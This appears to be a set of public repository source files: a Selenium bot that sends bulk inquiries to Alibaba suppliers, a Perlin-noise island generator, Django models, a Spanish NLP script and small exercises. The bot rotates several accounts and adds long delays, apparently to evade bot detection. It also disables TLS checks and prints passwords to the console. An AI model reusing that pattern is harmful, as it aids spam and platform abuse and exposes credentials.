4fb49f5467ce56af7e2012a6a1eadbe036caa6e3 | 9b8399e283014f3394f7a55e6350e4744a96441b | /Alibaba Inquiry Sender.py | bdae985a770a16170dfdcca296444d149d67b88f | [] | no_license | asimejaz14/AliBaba-Scraper | 42fc9eb78a0157a60d219ac03cdbc8ed4ee51783 | f7718d75d9e430697df2f92cd258a96fea5dddc7 | refs/heads/main | 2023-01-10T01:14:57.563299 | 2020-11-14T10:56:18 | 2020-11-14T10:56:18 | 312,797,457 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,568 | py | import ctypes
import time

from bs4 import BeautifulSoup
from pyfiglet import Figlet
from selenium import webdriver
from selenium.common.exceptions import TimeoutException, NoSuchElementException, ElementClickInterceptedException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait

# ASCII-art startup banner.
f = Figlet(font='slant')
print(f.renderText('Alibaba Inquiry Sender'))

# Shared Chrome options: incognito, no extensions, relaxed TLS errors
# and a desktop user agent so the normal (non-automation) site is served.
chrome_options = webdriver.ChromeOptions();
chrome_options.add_experimental_option("useAutomationExtension", False)
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--start-maximized")
chrome_options.add_argument("--incognito")
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--ignore-ssl-errors')
chrome_options.add_argument("user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)"
                            " Chrome/47.0.2526.111 Safari/537.36")
def countdown(t):
    """Block for *t* seconds, sleeping one second at a time (non-positive
    *t* returns immediately)."""
    remaining = t
    while remaining > 0:
        time.sleep(1)
        remaining -= 1
def get_supplier_urls(url_get):
    """Open the supplier-listing page *url_get* in the global `driver`
    and return the "contact supplier" links as absolute https URLs."""
    driver.get(url_get)
    listing = WebDriverWait(driver, 60).until(
        EC.presence_of_element_located(
            (By.XPATH, '//html/body/div[1]/div[2]/div/div[1]/div/div[2]')))
    # Parse the rendered listing with BeautifulSoup instead of walking
    # the DOM through selenium.
    soup = BeautifulSoup(listing.get_attribute('innerHTML'), 'lxml')

    supplier_urls = []
    for card in soup.findAll("div", {"data-spm": "35"}):
        anchor = card.find("a", {"class": "button csp"}, href=True)
        # hrefs are protocol-relative ("//..."), so prepend the scheme
        supplier_urls.append('https:' + anchor['href'])
    return supplier_urls
# Ask for the path of the file that lists the supplier-listing URLs.
try:
    file_path = input("Input URL file: ")
    file_path = file_path.strip('\"')
    file_path = file_path.rstrip('\"')
except FileNotFoundError:
    # NOTE(review): input() never raises FileNotFoundError; the open()
    # that could raise it is below, outside this try, so a bad path is
    # not actually caught here.
    print("File not found")
    exit()

# Inquiry message body sent to every supplier.
msg = ''
with open('message.txt', encoding='utf-8') as file:
    msg = file.read()

# Listing-page URLs, one per line (trailing newlines stripped).
urls_to_capture = []
with open(file_path, encoding='utf-8') as file:
    urls = file.readlines()
    for url in urls:
        url = url.rstrip('\n')
        urls_to_capture.append(url)

# Alibaba accounts, one "user:password" per line, rotated per listing page.
with open('credentials.txt', encoding='utf-8') as file:
    creds = file.readlines()
def login(username, password):
    """Log *username* into alibaba.com inside the global `driver`.

    Fills the credential fields, then waits up to 15s for a verification
    widget; if one appears a Windows message box asks the operator to
    solve it manually before submitting, otherwise the form is submitted
    directly when the wait times out.
    """
    driver.get('https://passport.alibaba.com/icbu_login.htm')
    # username
    select_option = WebDriverWait(driver, 60).until(
        EC.presence_of_element_located(
            (By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[4]/dl[1]/dd/div/input')))
    select_option.click()
    select_option.send_keys(username)
    # password
    select_option = WebDriverWait(driver, 60).until(
        EC.presence_of_element_located(
            (By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[4]/dl[2]/dd/div/input')))
    select_option.click()
    select_option.send_keys(password)
    try:
        # short wait for the manual-verification widget
        select_option = WebDriverWait(driver, 15).until(
            EC.presence_of_element_located(
                (By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[4]/dl[3]/dd[1]/div/div/div[1]/div[2]/span')))
        # widget present: pause for a human, then submit (Windows-only API)
        ctypes.windll.user32.MessageBoxW(0, "Press ok and verify", "Login", 1)
        time.sleep(15)
        select_option = WebDriverWait(driver, 60).until(
            EC.presence_of_element_located(
                (By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[5]/input[2]')))
        select_option.click()
    except TimeoutException:
        # no verification widget appeared: submit the form directly
        # time.sleep(15)
        # login
        select_option = WebDriverWait(driver, 60).until(
            EC.presence_of_element_located((By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[5]/input[2]')))
        select_option.click()
# verifying login
# select_option = WebDriverWait(driver, 60).until(
# EC.presence_of_element_located((By.XPATH, '//html/body/div[1]/header/div[2]/div[3]/div/div/form/div[2]')))
# Main driver: each listing URL gets a fresh browser session and the next
# account in round-robin order; supplier pages that fail are collected and
# written (deduplicated) into errors.txt.
errors = []
with open('errors.txt', 'w', encoding='utf-8') as file:
    counter1 = 0
    for url in urls_to_capture:
        # spliting username and password (round-robin through credentials)
        if counter1 == len(creds):
            counter1 = 0
        cr_splited = creds[counter1].split(':')
        counter1 += 1
        username = cr_splited[0]
        password = cr_splited[1]
        password = password.rstrip('\n')
        print("Logging in", username, password)
        driver = webdriver.Chrome(options=chrome_options)
        login(username, password)
        time.sleep(5)
        sup_urls = get_supplier_urls(url)
        print(f"Sending inquiry to {len(sup_urls)} suppliers one by one")
        counter = 0
        for s_url in sup_urls:
            counter += 1
            try:
                # if counter ==3:
                #     break
                time.sleep(3)
                driver.get(s_url)
                # inquiry text area
                select_option = WebDriverWait(driver, 60).until(
                    EC.presence_of_element_located(
                        (By.XPATH, '//html/body/div[2]/div/form/div[1]/div[4]/div/textarea')))
                select_option.click()
                select_option.send_keys(msg)
                # /html/body/div[2]/div/div[2]/div/span
                # send button
                select_option = WebDriverWait(driver, 60).until(
                    EC.presence_of_element_located(
                        (By.XPATH, '//html/body/div[2]/div/form/div[1]/div[5]/div[3]/div[2]/input')))
                select_option.click()
                # print("URL:", counter)
                # print(s_url)
                print('Inquiry sent')
            except TimeoutException:
                print("INVALID", s_url)
                errors.append(s_url)
            except NoSuchElementException:
                print("INVALID", s_url)
                errors.append(s_url)
            except ElementClickInterceptedException:
                # a popup intercepted the click: dismiss it, then retry
                # the fill-and-send sequence once
                select_option = WebDriverWait(driver, 60).until(
                    EC.presence_of_element_located(
                        (By.XPATH, '//html/body/div[2]/div/div[2]/div/span')))
                select_option.click()
                select_option = WebDriverWait(driver, 60).until(
                    EC.presence_of_element_located(
                        (By.XPATH, '//html/body/div[2]/div/form/div[1]/div[4]/div/textarea')))
                select_option.click()
                select_option.send_keys(msg)
                # /html/body/div[2]/div/div[2]/div/span
                select_option = WebDriverWait(driver, 60).until(
                    EC.presence_of_element_located(
                        (By.XPATH, '//html/body/div[2]/div/form/div[1]/div[5]/div[3]/div[2]/input')))
                select_option.click()
                # print("URL:", counter)
                # print(s_url)
                print('Inquiry sent')
        # persist the (deduplicated) failures gathered so far
        final_errors = set(errors)
        for f in final_errors:
            file.write(f)
            file.write('\n')
        driver.quit()
        print()
        print("Automated bot delay 25 mins")
        print()
        countdown(1500)

# login()
print("Press any key to exit...")
driver.quit()
# --add-data "venv\Lib\site-packages\pyfiglet;./pyfiglet" | [
"noreply@github.com"
] | asimejaz14.noreply@github.com |
baba91a7ec782d10e70f4645c4c4bc184b8c00af | c390fecca9aa1c4ddf4f3fd6cf202e7991992dab | /ContourPerlin.py | a13256c03be96cf4ec5df6970ced13dab8970e63 | [] | no_license | Codingmace/Island-Generator | 2411f13e76d914c17c6e188c7659839d9c83262e | 19be89e94474cfd7352e0916a50362733965d996 | refs/heads/master | 2022-02-14T21:29:52.486702 | 2019-08-18T21:24:58 | 2019-08-18T21:24:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,645 | py | import PIL, random, sys, argparse, math
from PIL import Image, ImageDraw
import noise
def main():
    """Generate one contour-shaded island from Perlin noise and save it
    as Examples/Island-<offset>-w-<width>-h-<height>.png."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--width", default=1500, type=int)
    parser.add_argument("--height", default=1500, type=int)
    parser.add_argument("-s", "--scale", default=200.0, type=float)
    parser.add_argument("-o", "--octaves", default=6, type=int)
    parser.add_argument("-p", "--persistence", default=.5, type=float)
    parser.add_argument("-l", "--lacunarity", default=2.0, type=float)
    parser.add_argument("-b", "--base", default=0, type=int)
    parser.add_argument("-md", "--max_distance", default=900.0, type=float)
    parser.add_argument("-a", "--alter", default=0, type=int)
    args = parser.parse_args()

    random.seed()
    # random offset so each run samples a different region of noise space
    offset = random.randint(1, 100) * random.randint(1, 1000)
    width, height = args.width, args.height

    island = Image.new('RGBA', (width, height))
    canvas = island.load()

    for col in range(island.size[0]):
        for row in range(island.size[1]):
            # Perlin height value in roughly [-1, 1]
            elevation = noise.pnoise2((offset + col) / args.scale,
                                      (offset + row) / args.scale,
                                      args.octaves,
                                      args.persistence,
                                      args.lacunarity,
                                      width,
                                      height,
                                      args.base)
            # radial falloff: sink the terrain toward the image borders
            center_dist = math.sqrt(math.pow(col - width / 2, 2) +
                                    math.pow(row - height / 2, 2))
            elevation -= math.pow(center_dist / args.max_distance, 3)

            # shifting by alter is equivalent to lowering every threshold
            level = int(elevation * 100.0) + args.alter
            if level > 30:
                canvas[col, row] = (240, 240, 240)   # snow
            elif level > 20:
                canvas[col, row] = (200, 200, 200)   # rock
            elif level > 5:
                canvas[col, row] = (134, 164, 114)   # grass
            elif level > 0:
                canvas[col, row] = (236, 212, 184)   # sand
            else:
                canvas[col, row] = (153, 162, 157)   # water
    island.save('Examples/Island-{}-w-{}-h-{}.png'.format(offset, width, height))
if __name__ == "__main__":
main()
# 52 minutes - Definitely my maybe
# -> 1:07
# watch endsceen -> credits
| [
"erdavids@ncsu.edu"
] | erdavids@ncsu.edu |
88d0260a7a136e03170f9a8e165482b3bf44af38 | c5c32b63d6407136bc577b6b75b6bb9648bd11bc | /onboardingapp/team/migrations/0019_additionalinfo.py | 44d7e32fbccfe91638f017c087542d67a2dbef97 | [] | no_license | elston/onboardingapp | 33adf70459797a0ce28b6178d09496d91275487f | b99f338cbed62812c069bf2e7dba781aec4ad741 | refs/heads/master | 2021-01-21T20:53:07.294200 | 2017-04-10T09:09:01 | 2017-04-10T09:09:01 | 69,735,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-01 22:09
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('team', '0018_team_admin'),
]
operations = [
migrations.CreateModel(
name='AdditionalInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('data', models.CharField(blank=True, max_length=255)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='service_info', to='team.Service')),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='team_info', to='team.Team')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='teamuser_info', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"3977522@gmail.com"
] | 3977522@gmail.com |
de1019483b69941bd011ad7b7553ba4bb7c5128a | 2fcf03728f7aaee3f9f8de3dbdfdc35468e8b70a | /ReviewItems/Rew.py | 9a2b1b9f6f31ad120040dce7e8f13966c59e9f75 | [] | no_license | zolunga/PLN | 1a116242a2a085978d7ce0aa191bc147193c7e7f | 9efb5000d31e533285b9f9b5692c1184aba05628 | refs/heads/master | 2020-03-27T23:01:53.117689 | 2018-11-30T05:31:01 | 2018-11-30T05:31:01 | 147,283,097 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,446 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 19 16:28:35 2018
@author: Alan
"""
import nltk
import pickle
import re
import json
import operator
from bs4 import BeautifulSoup
from nltk import word_tokenize
from nltk.corpus import PlaintextCorpusReader
def getCorpusTokens(NameDoc, encode):
    '''Read *NameDoc* (HTML allowed), strip markup, lowercase the text
    and return its NLTK word tokens; return [] when the file cannot be
    read.'''
    try:
        # with-statement guarantees the handle is closed even if read() fails
        with open(NameDoc, encoding=encode) as f:
            t = f.read()
    except Exception:
        # missing review files are expected: getAllReviews probes many names
        return []
    soup = BeautifulSoup(t, 'lxml')
    tS = soup.get_text()
    tS = tS.replace('\x97', ' ')    # drop stray em-dash control character
    tS = tS.lower()
    tokens = nltk.Text(nltk.word_tokenize(tS))
    return tokens
def getCorpusSentences(NameDoc, encode):
    '''Read *NameDoc* (HTML allowed), strip markup, lowercase the text
    and return its NLTK sentence tokens; return [] when the file cannot
    be read.'''
    try:
        # with-statement guarantees the handle is closed even if read() fails
        with open(NameDoc, encoding=encode) as f:
            t = f.read()
    except Exception:
        # missing review files are expected: getAllReviews probes many names
        return []
    soup = BeautifulSoup(t, 'lxml')
    tS = soup.get_text()
    tS = tS.replace('\x97', ' ')    # drop stray em-dash control character
    tS = tS.lower()
    tokens = nltk.Text(nltk.sent_tokenize(tS))
    return tokens
def cleanTokens(vocabulario):
    '''Keep only lowercase (Spanish) letters inside each token; drop
    tokens that end up empty or look like URLs ("www"/"http").'''
    Arr = []
    for word in vocabulario:
        # one C-level pass replaces the original per-character re.match loop
        palabra_limpia = re.sub(r'[^a-záéíóúñ]', '', word)
        if palabra_limpia and "www" not in palabra_limpia and "http" not in palabra_limpia:
            Arr.append(palabra_limpia)
    return Arr
def deleteStopWords(vocabulario, sw):
    '''Return *vocabulario* without the words listed in *sw* (order of
    the remaining words is preserved).'''
    # a set makes each membership test O(1) instead of scanning sw
    stop = set(sw)
    return [word for word in vocabulario if word not in stop]
def loadLemmaDict():
    '''Unpickle and return the lemma dictionary stored in ./dictionary.'''
    # with-statement closes the file even if unpickling fails
    with open('dictionary', 'rb') as file:
        return pickle.load(file)
def getAllReviews():
    '''Collect sentence-tokenized review texts from the "moviles" folder
    (files no_<i>_<j>.txt / yes_<i>_<j>.txt, i in 0..5, j in 0..29);
    keys are the file names without the "moviles/" prefix, files that
    cannot be read are skipped.'''
    texts = {}
    for product in range(0, 6):
        for review in range(0, 30):
            # the "no" variant is probed before the "yes" one, as before
            for prefix in ("no", "yes"):
                path = "moviles/{}_{}_{}.txt".format(prefix, product, review)
                sentences = getCorpusSentences(path, 'utf-8')
                if len(sentences) > 0:
                    texts[path[8:]] = sentences
    return texts
def lemmatizado(text, lemmas):
    '''Map each word to its lemma entry; words with no match fall back to
    {'Palabra': word, 'tipo': 'sn'} (first matching stem wins).

    *lemmas* maps a first letter to {stem: {'Terminaciones': [endings],
    'Palabra': lemma, 'Classificiacion': pos-tag}}; like the original,
    a word whose first letter is absent raises KeyError.
    '''
    new_text = []
    for word in text:
        dictLetter = lemmas[word[0]]
        entry = None
        for stem in dictLetter:
            candidate = dictLetter[stem]
            if any(stem + ending == word for ending in candidate['Terminaciones']):
                entry = {'Palabra': candidate['Palabra'],
                         'tipo': candidate['Classificiacion']}
                break
        if entry is None:
            # Unknown word: tag it "sn".  The original appended this
            # fallback for *every* word, duplicating matched words.
            entry = {'Palabra': word, 'tipo': "sn"}
        new_text.append(entry)
    return new_text
def countNouns(texts):
    '''Count common-noun occurrences (POS tags starting with "nc")
    across all lemmatized reviews in *texts*; returns {word: count}.'''
    dictCount = {}
    for key in texts:
        for element in texts[key]:
            # removed leftover debug print(element) from the hot loop
            if element['tipo'].startswith("nc"):
                palabra = element['Palabra']
                dictCount[palabra] = dictCount.get(palabra, 0) + 1
    return dictCount
def compute_ngrams(sequence, n):
    """Return an iterator over the consecutive n-grams of *sequence* as
    tuples, by zipping n progressively shifted views."""
    shifted = [sequence[offset:] for offset in range(n)]
    return zip(*shifted)
def getTopNgrams(corpus, ngram_val=2, limit=5):
    '''Return the *limit* most frequent n-grams of *corpus* as
    ("w1 w2 ...", count) pairs, most frequent first (ties keep
    first-seen order).'''
    from collections import Counter
    ngrams = compute_ngrams(corpus, ngram_val)
    # nltk.FreqDist is a Counter subclass, so counting with Counter plus
    # the same stable descending sort reproduces the original exactly
    # without requiring nltk inside this function.
    ngrams_freq_dist = Counter(ngrams)
    sorted_ngrams_fd = sorted(ngrams_freq_dist.items(), key=operator.itemgetter(1), reverse=True)
    sorted_ngrams = sorted_ngrams_fd[0:limit]
    return [(' '.join(text), freq) for text, freq in sorted_ngrams]
def getSentimentalDictionary():
    '''Parse fullStrengthLexicon.txt (tab-separated, word first, polarity
    last) into {word: polarity}.'''
    dict1 = {}
    # with-statement fixes the original's never-closed file handle
    with open('fullStrengthLexicon.txt', encoding='utf-8') as doc:
        for line in doc.read().split("\n"):
            if not line:
                # skip blank/trailing lines (the original registered a '' key)
                continue
            pala = line.split("\t")
            dict1[pala[0]] = pala[len(pala) - 1]
    return dict1
# ---- driver script -------------------------------------------------------
# Load resources, run the clean -> stop-word -> lemmatize pipeline on every
# review, dump the intermediate results and the final noun counts to
# Res1.txt.
sentimental_dict = getSentimentalDictionary()
textoSW = getCorpusTokens('stopwords_es.txt', 'utf-8')   # Spanish stop words
textoReviews = getAllReviews()
lemmas = loadLemmaDict()
dictionaryCount = {}

# NOTE(review): Res1.txt is opened without an explicit encoding and via a
# bare open()/close() pair -- confirm the platform default encoding is OK.
file = open('Res1.txt','w')
for key in textoReviews:
    print(key)
    #print(getTopNgrams(textoReviews[key], 2, 5))
    # pipeline per review: clean tokens -> remove stop words -> lemmatize
    textoReviews[key] = cleanTokens(textoReviews[key])
    textoReviews[key] = deleteStopWords(textoReviews[key], textoSW)
    textoReviews[key] = lemmatizado(textoReviews[key], lemmas)
    file.write(key)
    file.write("-------------\n")
    file.write(json.dumps(textoReviews[key]))
    file.write("-------------\n\n\n\n\n\n\n\n\n\n\n\n")

# noun frequencies over every review, sorted ascending by count
last = countNouns(textoReviews)
last = sorted(last.items(), key=operator.itemgetter(1))
file.write("------------------------conteos----------------------------")
file.write(json.dumps(last))
file.close()
| [
"alangarcia3106@gmail.com"
] | alangarcia3106@gmail.com |
20bdec0d5bd5b987f0ea7fa1bd7a366e3ad602c9 | 4fe0726ad41024f99e969c2e73861badd907e23d | /TestAndOtherProgramsToPlayWithVSCode/hello.py | 5fb19379ebaad1ef6df2a486bf8f805b359de2cb | [] | no_license | bhattner143/StentResultCompilationForESR | ab8116a32d8bf66aea536b7e25f05980250a7ee3 | 1536c471ef099206c0aeb1c065288283b723b6a7 | refs/heads/master | 2020-08-01T10:13:53.277877 | 2019-09-26T00:18:37 | 2019-09-26T00:18:37 | 210,961,048 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43 | py | msg = "Hello World"
print(msg)  # greet with the message assigned just above

import sys  # NOTE(review): unused and placed after code -- PEP 8 puts imports first
| [
"dipankarbhattacharya@wifi-staff-172-24-62-35.net.auckland.ac.nz"
] | dipankarbhattacharya@wifi-staff-172-24-62-35.net.auckland.ac.nz |
e4db636c96c7c98f7cde1d8fff7c3cbc6e56d138 | ed7412b75887753c4b4a37b134e7b869d183514b | /taxProject/tax/models.py | 67c187744095194b4346c03291066e3bb4bb72f5 | [] | no_license | alison990222/pwc-tax-project | 4ad73dbcc3f2330bf6d4919ee515887b97fa3b2b | c065ad4d1468262ffbdbd2e959cbcf1231dc2a69 | refs/heads/master | 2023-02-24T23:36:07.836691 | 2021-01-17T15:34:58 | 2021-01-17T15:34:58 | 278,887,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | from django.db import models
class TaxDatabase(models.Model):
    """Tax-category lookup entry: a commodity code with its two-level
    category (name + id) and a free-form description."""
    # commodity code
    code = models.CharField(max_length=30)
    # top-level category name
    firstCategory = models.CharField(max_length=60, null=True, default=None)
    # top-level category id
    FirstCategoryID = models.CharField(max_length=30, null=True, default=None)
    # sub-category name
    secondCategory = models.CharField(max_length=60, null=True, default=None)
    # sub-category id
    SecondCategoryID = models.CharField(max_length=30, null=True, default=None)
    # free-form description / extra info
    info = models.CharField(max_length=3000, null=True, default=None)
class itemDatabase(models.Model):
    """A concrete item (free-text name) mapped to its commodity code and
    two-level category."""
    # item name / description
    item = models.CharField(max_length=1000, null=True, default=None)
    # commodity code
    itemCode = models.CharField(max_length=30)
    # top-level category name
    itemFirstCategory = models.CharField(max_length=60, null=True, default=None)
    # top-level category id
    itemFirstCategoryID = models.CharField(max_length=30, null=True, default=None)
    # sub-category name
    itemSecondCategory = models.CharField(max_length=60, null=True, default=None)
    # sub-category id
    itemSecondCategoryID = models.CharField(max_length=30, null=True, default=None)
| [
"zhangxt0222@163.com"
] | zhangxt0222@163.com |
4ed23754e991aa7060ba6eb0d47ad7a5ae3e4dfc | eb7d96d3c02c36d3c7a4c1714aa04bd3c4fa0906 | /torpedo.py | ac598aaaad211e28e34ce116c421b4612229e1e8 | [] | no_license | dor-roter/asteroids | b7b3a5b483453ac9ff026da799080e782a238bb1 | 34a57bd38ea7021c7bfa6d1317317f49b99a2baa | refs/heads/master | 2020-12-03T16:08:29.395427 | 2020-01-05T16:19:38 | 2020-01-05T16:19:38 | 231,384,169 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,100 | py | ################################################
# File: torpedo.py
# Writer: Asif Kagan, Dor Roter
# Login: asifka, dor.roter
# Exercise: ------
# More:
# Consulted: -----
# Internet:
# Notes:
################################################
from game_object import GameObject
import math
class Torpedo(GameObject):
    """A torpedo projectile launched from a ship."""

    # public static constants
    RADIUS = 4          # collision radius, in game units
    LIFE_SPAN = 200     # number of ticks before the torpedo expires

    def __init__(self, ship):
        """Create a torpedo launched from *ship*, inheriting its position
        and heading; its speed is the ship's speed plus a fixed boost of
        2 units along the heading.

        :param ship: the launching ship
        :type ship: Ship
        """
        self.__heading = ship.get_heading()
        launch_speed = self.__calc_speed(ship.get_speed())
        super().__init__(ship.get_coordinates(), launch_speed, Torpedo.RADIUS)
        self.__time_alive = 0

    def get_heading(self):
        """Return the torpedo's heading (degrees)."""
        return self.__heading

    def get_draw_data(self):
        """Return (x, y, heading) -- everything needed for one draw call."""
        x_pos, y_pos = self._coordinates
        return x_pos, y_pos, self.__heading

    def time_tick(self):
        """Advance the lifetime counter by one tick.

        :return: True while the torpedo is still alive, False once its
            lifespan has run out (it blew up).
        """
        self.__time_alive += 1
        return self.__time_alive <= Torpedo.LIFE_SPAN

    def __calc_speed(self, ship_speed):
        """Combine the launching ship's (x, y) speed with a boost of 2
        units along the torpedo's heading.

        :param ship_speed: the ship's initial (x, y) speed
        :return: Tuple: (float, float)
        """
        base_x, base_y = ship_speed
        angle = math.radians(self.__heading)
        return base_x + 2 * math.cos(angle), base_y + 2 * math.sin(angle)
| [
"dor.roter.10@gmail.com"
] | dor.roter.10@gmail.com |
7dcb2f9b496fcb6212835db99ece1469a3157641 | ab09e8ad44fdaf7ccd27087d981c21fbdac85c00 | /python_tutor/09_two-dimensional_arrays/swap.py | 80ee53ac75e8f381a2d3eb34c03938e025d46e4c | [
"Apache-2.0"
] | permissive | sunnychemist/pylearn | bf96fc2b9c247c69fbcb9e1927ef0d90ee5994a0 | 29566b75c14f867bd7e8fc19c236e9be4f9f5203 | refs/heads/master | 2022-11-10T03:43:43.825472 | 2020-06-15T23:41:24 | 2020-06-15T23:41:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | def swap_columns(a, i, j):
print('start: ')
for row in a:
print(row)
for y in range(len(a[1])):
for x in range(len(a)):
if y == i:
a[x][i], a[x][j] = a[x][j], a[x][i]
print('end: ')
for row in a:
print(row)
swap_columns([[11, 12, 13, 14], [21, 22, 23, 24], [31, 32, 33, 34]], 0, 1)
| [
"ctatuk@gmail.com"
] | ctatuk@gmail.com |
6cec9f70eb042e0d9c6ea3ff9e3719cc9f63c302 | 1f45d93123c6d40bab4b783670e41d8eb8f6ae6c | /day2-lunch/day2-exercise-2.py | 50125b91217f1636cc04d9e8dffd4051be989316 | [] | no_license | JTdeKay/qbb2018-answers | fd19bf137f92c820fd3ee9c529e7420b256d3105 | 75189fa89b3a356b8abc689e5cc26060256031e2 | refs/heads/master | 2021-07-15T20:32:16.622415 | 2019-01-01T16:02:10 | 2019-01-01T16:02:10 | 146,313,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 462 | py | #!/usr/bin/env python3
import sys

# Count perfectly aligned reads (SAM optional tag NM:i:0 -- edit distance
# zero).  Input: a SAM file named on the command line, or stdin when no
# argument is supplied; header lines (starting with "@") are skipped.
if len(sys.argv) > 1:
    f = open(sys.argv[1])
else:
    f = sys.stdin

count = 0
for line in f:
    # startswith() is also safe on empty lines, unlike line[0] indexing
    if line.startswith("@"):
        continue
    if "NM:i:0" in line:
        count += 1
print(count)
# scratch notes kept from the exercise:
# fields = line.rstrip("\r\n").split("\t")
# tx_len = int(fields[4]) - int(fields[3])
# if tx_len > 10000:
# print( fields[5], tx_len ) | [
"jdekay1@jhu.edu"
] | jdekay1@jhu.edu |
d2aa6ff19836d34ff0dab5a45d47cf65bd7f3324 | 02802ecfff8639edc093068da740ded8ee8228aa | /test/test_inline_object8.py | 4de4d72fa7c421eec5426415f92be8159709b6ab | [] | no_license | mintproject/data-catalog-client | 0fc406c2063864144a9a995e98724144b43feb66 | 22afd6341e5f66594c88134834d58e4136e4983a | refs/heads/master | 2020-12-08T21:56:02.785671 | 2020-05-13T03:53:51 | 2020-05-13T03:53:51 | 233,105,679 | 1 | 1 | null | 2020-05-13T03:53:53 | 2020-01-10T18:17:55 | Python | UTF-8 | Python | false | false | 873 | py | # coding: utf-8
"""
MINT Data Catalog
API Documentation for MINT Data Catalog # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: danf@usc.edu
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datacatalog
from datacatalog.models.inline_object8 import InlineObject8 # noqa: E501
from datacatalog.rest import ApiException
class TestInlineObject8(unittest.TestCase):
    """Unit test stubs for the generated InlineObject8 model."""
    def setUp(self):
        # No fixtures needed for these generated stubs.
        pass
    def tearDown(self):
        # Nothing to clean up.
        pass
    def testInlineObject8(self):
        """Test InlineObject8 construction (stub, not yet implemented)."""
        # FIXME: construct object with mandatory attributes with example values
        # model = datacatalog.models.inline_object8.InlineObject8() # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
"maxiosorio@gmail.com"
] | maxiosorio@gmail.com |
c72d3ee6684effa92d2cbf6f72daa15c513d5c2f | 4ce9ee078156d3bac04ddd95b664f7e3a76936c3 | /DjangoApp/admin.py | ad84aa3e6daec96bb72bc33295ab75e2038d5eeb | [] | no_license | rashinanwani/Django-NotesApp | c75d6674da29921243a46eb35dbc6d27e69e87d6 | d3784da6b4824d65927a9142544803a8d6aa8414 | refs/heads/master | 2022-12-28T07:04:54.024809 | 2020-10-18T21:36:35 | 2020-10-18T21:36:35 | 303,507,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | from django.contrib import admin
from .models import table1
from .models import viewnotes
# Register your models here.
admin.site.register(table1)
admin.site.register(viewnotes)
# Register the admin class with the associated model
# admin.site.register(table2)
# # Define the admin class
# class AuthorAdmin(admin.ModelAdmin):
# pass
# # Register the admin class with the associated model
# admin.site.register(Author, AuthorAdmin)
| [
"rashi.nanwani2000@gmail.com"
] | rashi.nanwani2000@gmail.com |
2fe12a441312c3fc3ef7a59835ec534a37ad8515 | 82c5f8e65fb60b179e3adcc2c0525d821a5298d2 | /Module 6/01_nodes_create.py | 57312d77edc7cafe6f7c2b68081567fc78f69d11 | [] | no_license | AnnaZhuravleva/Specialist_Python_2 | 6009357ccf694507c6fc93daf69129831639aa8b | fcde1dcc8c70376dc8c6ae8591c50fcb65bac327 | refs/heads/main | 2023-07-10T23:12:16.051455 | 2021-07-29T21:12:07 | 2021-07-29T21:12:07 | 386,949,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | class Node:
"""
Класс для узла списка. Хранит значение и указатель на следующий узел.
"""
def __init__(self, value=None, next=None):
self.value = value
self.next = next
# Create the nodes
node0 = Node("Иван")
node1 = Node("Алекс")
node2 = Node("Петр")
node3 = Node("Анна")
node4 = Node("Кирилл")
# TODO: add a few more nodes with names

# Link every node to its successor.
chain = [node0, node1, node2, node3, node4]
for left, right in zip(chain, chain[1:]):
    left.next = right

# Walk the list from the head, printing each stored value.
cursor = node0
while cursor is not None:
    print(cursor.value)
    cursor = cursor.next
| [
"noreply@github.com"
] | AnnaZhuravleva.noreply@github.com |
ad162c4e98bd7aa84c852f1952f25d97c3b9fc78 | 6c155ae12169c32ab7027d3cc32c18c1e02f07ac | /question6.py | 9903946fc7a7d586b54cd8e41029cff807d924ff | [] | no_license | fengshixiang/Target-Offer | e067f3baa30bc13f63db6c21c86c7751e8c500e3 | 473fb244099b77348a565e4b513efd8f3c72ef1e | refs/heads/main | 2023-03-24T09:44:21.408827 | 2021-03-14T14:07:39 | 2021-03-14T14:07:39 | 346,281,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | # -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    # Return the node values ordered from tail to head, e.g. [1, 2, 3]
    def printListFromTailToHead(self, listNode):
        """Walk the list head->tail collecting values, then reverse in place."""
        values = []
        node = listNode
        while node is not None:
            values.append(node.val)
            node = node.next
        values.reverse()
        return values
"1150415892@qq.com"
] | 1150415892@qq.com |
